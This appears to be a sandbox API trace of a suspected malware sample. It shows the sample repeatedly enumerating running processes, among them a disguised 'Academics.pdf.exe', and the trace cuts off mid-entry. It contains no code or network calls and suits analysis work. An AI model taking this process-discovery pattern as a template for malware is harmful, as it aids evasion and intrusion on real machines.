[0313.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0313.067] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0313.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0313.067] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0313.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0313.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0313.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0313.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0313.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0313.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0313.068] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0313.069] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.070] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0313.071] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0313.071] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0313.072] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0313.073] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0313.073] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0313.074] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0313.075] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0313.075] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0313.076] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.077] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.077] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.078] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.079] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.079] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0313.080] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.081] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.081] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0313.082] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0313.083] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0313.083] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0313.084] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.085] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0313.085] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0313.086] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0313.087] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0313.087] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0313.088] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0313.088] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0313.089] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0313.090] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0313.090] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0313.091] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0313.092] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0313.092] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0313.093] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0313.094] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0313.094] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0313.095] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0313.096] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0313.096] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0313.097] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.098] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0313.098] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.099] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0313.100] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0313.100] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0313.101] CloseHandle (hObject=0x294) returned 1 [0313.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0313.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0313.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0313.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0313.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0313.101] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0313.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0313.102] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0313.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0313.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0313.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0313.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0313.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0313.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0313.102] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0313.104] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.104] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0313.105] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0313.106] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0313.107] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0313.107] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0313.108] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0313.109] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0313.109] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0313.110] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0313.111] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.111] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.112] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.113] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.113] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.114] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0313.115] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.116] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.117] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0313.117] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0313.118] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0313.119] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0313.119] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.120] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0313.121] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0313.121] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0313.122] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, 